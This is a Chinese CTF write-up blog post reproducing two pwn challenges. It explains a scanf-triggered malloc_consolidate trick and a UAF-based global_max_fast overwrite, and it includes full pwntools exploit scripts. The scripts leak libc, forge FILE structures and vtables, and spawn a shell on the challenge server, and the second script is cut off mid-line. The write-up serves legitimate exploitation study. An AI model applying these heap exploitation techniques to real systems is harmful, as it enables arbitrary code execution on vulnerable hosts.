<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="学习给自己的">
    <meta name="description" content="一天一步，总会到的">
    <meta name="author" content="LOLOLO">
    
    <title>
        
            题目复现 |
        
        桥下少年
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/1.jpg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.5/source/css/font-awesome.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"lololo-pwn.github.io","root":"/","language":"zh-CN"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true},"style":{"primary_color":"#339966","avatar":"/images/1.jpg","favicon":"/images/1.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"不要留恋过去,空想未来,专注当下。"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":false}}},"local_search":{"enable":false,"preload":true},"code_copy":{"enable":true,"style":"mac"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"3.4.5"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
  </script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                桥下少年
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">题目复现</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/1.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">LOLOLO</span>
                        
                            <span class="author-label">Lv2</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-02-07 17:29:23</span>
        <span class="mobile">2022-02-07 17:29</span>
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/PWN/">PWN</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>1.4k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>7 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="有关scanf的利用"><a href="#有关scanf的利用" class="headerlink" title="有关scanf的利用"></a>有关scanf的利用</h1><blockquote>
<p>在通过scanf输入，当输入非常长的字符串的时候，即使我们使用setbuf()关闭了输入缓冲区，还是依旧会暂时申请一个large chunk来存储输入的字符串。 这样就会导致 malloc_consolidate的发生</p>
</blockquote>
<h2 id="build-house"><a href="#build-house" class="headerlink" title="build_house"></a>build_house</h2><p><img src="/2022/02/07/%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/1.png"></p>
<h2 id="view-house"><a href="#view-house" class="headerlink" title="view_house"></a>view_house</h2><p><img src="/2022/02/07/%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/2.png"></p>
<h2 id="delet-house"><a href="#delet-house" class="headerlink" title="delet_house"></a>delet_house</h2><p><img src="/2022/02/07/%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/3.png"></p>
<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><ul>
<li>scanf输入超长字符串触发malloc_consolidate以此来泄露libc，同时做堆布局</li>
<li>利用unsorted bin attack 来将_IO_list_all内容改写为main_arena+96，即small bin[4]的位置，同时在该位置上直接构造fake_vtable,填入onegadge获取shell</li>
</ul>
<h2 id="exp-是用其他师傅的，自己当时想不到，后来也没写"><a href="#exp-是用其他师傅的，自己当时想不到，后来也没写" class="headerlink" title="exp(是用其他师傅的，自己当时想不到，后来也没写)"></a>exp(是用其他师傅的，自己当时想不到，后来也没写)</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.terminal = [<span class="string">&#x27;terminator&#x27;</span>,<span class="string">&#x27;-x&#x27;</span>,<span class="string">&#x27;sh&#x27;</span>,<span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">binary=<span class="string">&#x27;./build_your_house&#x27;</span></span><br><span class="line">main_arena = <span class="number">0x3c4b20</span></span><br><span class="line">s = <span class="keyword">lambda</span> buf: io.send(buf)</span><br><span class="line">sl = <span class="keyword">lambda</span> buf: io.sendline(buf)</span><br><span class="line">sa = <span class="keyword">lambda</span> delim, buf: io.sendafter(delim, buf)</span><br><span class="line">sal = <span class="keyword">lambda</span> delim, buf: io.sendlineafter(delim, buf)</span><br><span class="line">shell = <span class="keyword">lambda</span>: io.interactive()</span><br><span class="line">r = <span class="keyword">lambda</span> n=<span class="literal">None</span>: io.recv(n)</span><br><span class="line">ra = <span class="keyword">lambda</span> t=tube.forever:io.recvall(t)</span><br><span class="line">ru = <span class="keyword">lambda</span> delim: io.recvuntil(delim)</span><br><span class="line">rl = <span class="keyword">lambda</span>: io.recvline()</span><br><span class="line">rls = <span class="keyword">lambda</span> n=<span class="number">2</span>**<span class="number">20</span>: io.recvlines(n)</span><br><span class="line">su = <span class="keyword">lambda</span> buf,addr:io.success(buf+<span class="string">&quot;==&gt;&quot;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line">local = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">    io=process(binary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io=remote(<span class="string">&#x27;123.57.131.167&#x27;</span>,<span class="number">38409</span>)</span><br><span class="line">e=ELF(binary)</span><br><span class="line">libc=ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line">one_gadget = [<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">choice</span>(<span class="params">i</span>):</span></span><br><span class="line">	ru(<span class="string">&#x27;Choice:&#x27;</span>)</span><br><span class="line">	sl(<span class="built_in">str</span>(i))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content=<span class="string">b&#x27;a\n&#x27;</span></span>):</span></span><br><span class="line">	choice(<span class="number">1</span>)</span><br><span class="line">	ru(<span class="string">&#x27;How big a house do you want to build?&#x27;</span>)</span><br><span class="line">	sl(<span class="built_in">str</span>(size))</span><br><span class="line">	ru(<span class="string">&#x27;How do you want to decorate your house?&#x27;</span>)	</span><br><span class="line">	s(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">	choice(<span class="number">2</span>)</span><br><span class="line">	ru(<span class="string">&#x27;Which house do you want to remove?&#x27;</span>)</span><br><span class="line">	sl(<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">	choice(<span class="number">3</span>)</span><br><span class="line">	ru(<span class="string">&quot;Which house do you want to view?\n&quot;</span>)</span><br><span class="line">	sl(<span class="built_in">str</span>(idx))</span><br><span class="line">add(<span class="number">0x38</span>)<span class="comment">#0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">	add(<span class="number">0x30</span>)<span class="comment">#1-4</span></span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#6</span></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">	free(i+<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">add(<span class="number">0x38</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x38</span>)<span class="comment">#0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">	add(<span class="number">0x30</span>)<span class="comment">#1-4</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">free(<span class="number">6</span>)</span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#---------------------------</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#5 = 2</span></span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#6 = 3</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x30</span>)<span class="comment">#7 = 4</span></span><br><span class="line">add(<span class="number">0x40</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x40</span>)<span class="comment">#8</span></span><br><span class="line">add(<span class="number">0x40</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x40</span>)<span class="comment">#9</span></span><br><span class="line">add(<span class="number">0x40</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x40</span>)<span class="comment">#10</span></span><br><span class="line"><span class="comment">#--------------------------</span></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">show(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_libc</span>():</span></span><br><span class="line">    <span class="keyword">global</span> libc_base,mh,fh,system,binsh_addr,_IO_2_1_stdout_,realloc,io_list_all</span><br><span class="line">    libc_base = u64(ru(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-main_arena-<span class="number">200</span></span><br><span class="line">    su(<span class="string">&quot;libc base &quot;</span>,libc_base)</span><br><span class="line">    mh = libc_base + libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">    system = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">    binsh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">    realloc = libc_base + libc.sym[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line">    fh = libc_base + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">    _IO_2_1_stdout_ = libc_base + libc.sym[<span class="string">&#x27;_IO_2_1_stdout_&#x27;</span>]</span><br><span class="line">    io_list_all = libc_base+libc.symbols[<span class="string">&#x27;_IO_list_all&#x27;</span>]</span><br><span class="line">leak_libc()</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">add(<span class="number">0x30</span>)<span class="comment">#5 = 2</span></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#6 = 3</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line">	add(<span class="number">0x18</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">23</span>+<span class="string">&#x27;\n&#x27;</span>)<span class="comment">#4,7==11,12</span></span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">15</span>+<span class="string">&#x27;\n&#x27;</span>)<span class="comment">#13</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">13</span>)</span><br><span class="line">free(<span class="number">5</span>)<span class="comment">#2  0x41	</span></span><br><span class="line"></span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">free(<span class="number">7</span>)</span><br><span class="line">free(<span class="number">12</span>)</span><br><span class="line">show(<span class="number">11</span>)</span><br><span class="line">heap = u64(rl()[-<span class="number">7</span>:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">224</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(heap)</span><br><span class="line"></span><br><span class="line">sl(<span class="string">&#x27;1&#x27;</span>*<span class="number">1024</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x10</span>)<span class="comment">#4</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x30</span>,p64(<span class="number">0</span>)+p64(io_list_all-<span class="number">0x10</span>)+<span class="string">&#x27;\n&#x27;</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line">free(<span class="number">9</span>)</span><br><span class="line">add(<span class="number">0x40</span>,<span class="string">b&#x27;\0&#x27;</span>*<span class="number">0x18</span>+p64(heap+<span class="number">480</span>+<span class="number">16</span>)+<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">10</span>)</span><br><span class="line">add(<span class="number">0x47</span>,p64(one_gadget[<span class="number">1</span>]+libc_base)*<span class="number">8</span>+p64(one_gadget[<span class="number">1</span>]+libc_base)[:-<span class="number">1</span>])</span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line">sl(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">free(5)#2  0x41	</span></span><br><span class="line"><span class="string">free(4)</span></span><br><span class="line"><span class="string">free(7)</span></span><br><span class="line"><span class="string">free(10)</span></span><br><span class="line"><span class="string">sl(&#x27;1&#x27;*1024)</span></span><br><span class="line"><span class="string">add(0x10)#2&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">shell()</span><br></pre></td></tr></table></figure>

<p>第一次遇到scanf字符串超长触发malloc_consolidate。</p>
<h1 id="HWS-pwn1"><a href="#HWS-pwn1" class="headerlink" title="HWS pwn1"></a>HWS pwn1</h1><blockquote>
<p>本来是想去线下的，比赛开始以后发现应该只会这一题，感觉无望，所以直接放弃比赛。</p>
</blockquote>
<p><img src="/2022/02/07/%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/4.png"></p>
<p><img src="/2022/02/07/%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/5.png"></p>
<h2 id="解题思路-1"><a href="#解题思路-1" class="headerlink" title="解题思路"></a>解题思路</h2><blockquote>
<p>题目就一个流程，在rename之后存在一个uaf漏洞，由于申请和释放的堆块都很大，所以想到了利用IO</p>
</blockquote>
<ul>
<li><p>首先是利用UAF来进行unsorted bin attack，将global_max_fast改为main_arena+96,在程序的最后会将两个堆块释放，因为global_max_fast被改成较大的数，所以两个堆块会被放入fast链表当中去；而fast链表有个下标的判断如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##define fastbin_index(sz) \</span></span><br><span class="line">    ((((unsigned <span class="built_in">int</span>) (sz)) &gt;&gt; (SIZE_SZ == <span class="number">8</span> ? <span class="number">4</span> : <span class="number">3</span>)) - <span class="number">2</span>)</span><br></pre></td></tr></table></figure></li>
<li><p>然后知道fast链表头都存放在main_arena+16之后；根据计算_IO_list_all和main_arena+16的距离为0xa10，根据计算(((0xa10/8)+2&lt;&lt;4)可得出应该申请的堆块大小为0x1340</p>
</li>
<li><p>最后就是构造fake_io</p>
</li>
</ul>
<h2 id="最后放上原题exp"><a href="#最后放上原题exp" class="headerlink" title="最后放上原题exp"></a>最后放上原题exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line"><span class="comment"># from LibcSearcher import *</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">file_name = <span class="string">&#x27;./pwn&#x27;</span></span><br><span class="line">libc_name = <span class="string">&#x27;/home/lol/glibc-all-in-one/libs/2.27-3ubuntu1.2_amd64/libc-2.27.so&#x27;</span></span><br><span class="line">ip = <span class="string">&#x27;1.13.162.249&#x27;</span></span><br><span class="line">prot = <span class="string">&#x27;10001&#x27;</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    r = process(file_name)</span><br><span class="line">    libc = ELF(libc_name)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    r = remote(ip, <span class="built_in">int</span>(prot))</span><br><span class="line">    libc = ELF(libc_name)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>():</span></span><br><span class="line">    gdb.attach(r)</span><br><span class="line">    raw_input()</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pack_file</span>(<span class="params">_flags=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_read_ptr=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_read_end=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_read_base=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_write_base=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_write_ptr=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_write_end=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_buf_base=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_buf_end=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_save_base=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_backup_base=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_save_end=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_marker=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _IO_chain=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _fileno=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _lock=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _wide_data=<span class="number">0</span>,</span></span></span><br><span class="line"><span class="params"><span class="function">              _mode=<span class="number">0</span></span>):</span></span><br><span class="line">    file_struct = p32(_flags) + \</span><br><span class="line">                  p32(<span class="number">0</span>) + \</span><br><span class="line">                  p64(_IO_read_ptr) + \</span><br><span class="line">                  p64(_IO_read_end) + \</span><br><span class="line">                  p64(_IO_read_base) + \</span><br><span class="line">                  p64(_IO_write_base) + \</span><br><span class="line">                  p64(_IO_write_ptr) + \</span><br><span class="line">                  p64(_IO_write_end) + \</span><br><span class="line">                  p64(_IO_buf_base) + \</span><br><span class="line">                  p64(_IO_buf_end) + \</span><br><span class="line">                  p64(_IO_save_base) + \</span><br><span class="line">                  p64(_IO_backup_base) + \</span><br><span class="line">                  p64(_IO_save_end) + \</span><br><span class="line">                  p64(_IO_marker) + \</span><br><span class="line">                  p64(_IO_chain) + \</span><br><span class="line">                  p32(_fileno)</span><br><span class="line">    file_struct = file_struct.ljust(<span class="number">0x88</span>, <span class="string">b&quot;\x00&quot;</span>)</span><br><span class="line">    file_struct += p64(_lock)</span><br><span class="line">    file_struct = file_struct.ljust(<span class="number">0xa0</span>, <span class="string">b&quot;\x00&quot;</span>)</span><br><span class="line">    file_struct += p64(_wide_data)</span><br><span class="line">    file_struct = file_struct.ljust(<span class="number">0xc0</span>, <span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">    file_struct += p64(_mode)</span><br><span class="line">    file_struct = file_struct.ljust(<span class="number">0xd8</span>, <span class="string">b&quot;\x00&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> file_struct</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">file = ELF(file_name)</span><br><span class="line">sl = <span class="keyword">lambda</span> x: r.sendline(x)</span><br><span class="line">sd = <span class="keyword">lambda</span> x: r.send(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x, y: r.sendlineafter(x, y)</span><br><span class="line">rud = <span class="keyword">lambda</span> x: r.recvuntil(x, drop=<span class="literal">True</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x: r.recvuntil(x)</span><br><span class="line">li = <span class="keyword">lambda</span> name, x: log.info(name + <span class="string">&#x27;:&#x27;</span> + <span class="built_in">hex</span>(x))</span><br><span class="line">ri = <span class="keyword">lambda</span>: r.interactive()</span><br><span class="line">ru(<span class="string">&#x27;Now you can get a big box, what size?&#x27;</span>)</span><br><span class="line">sl(<span class="built_in">str</span>(<span class="number">0x1430</span>))</span><br><span class="line">ru(<span class="string">&#x27;Now you can get a bigger box, what size?&#x27;</span>)</span><br><span class="line">sl(<span class="built_in">str</span>(<span class="number">0x5000</span>))</span><br><span class="line">ru(<span class="string">&#x27;Do you want to rename?(y/n)&#x27;</span>)</span><br><span class="line">sl(<span class="string">&#x27;y&#x27;</span>)</span><br><span class="line">ru(<span class="string">&#x27;Now your name 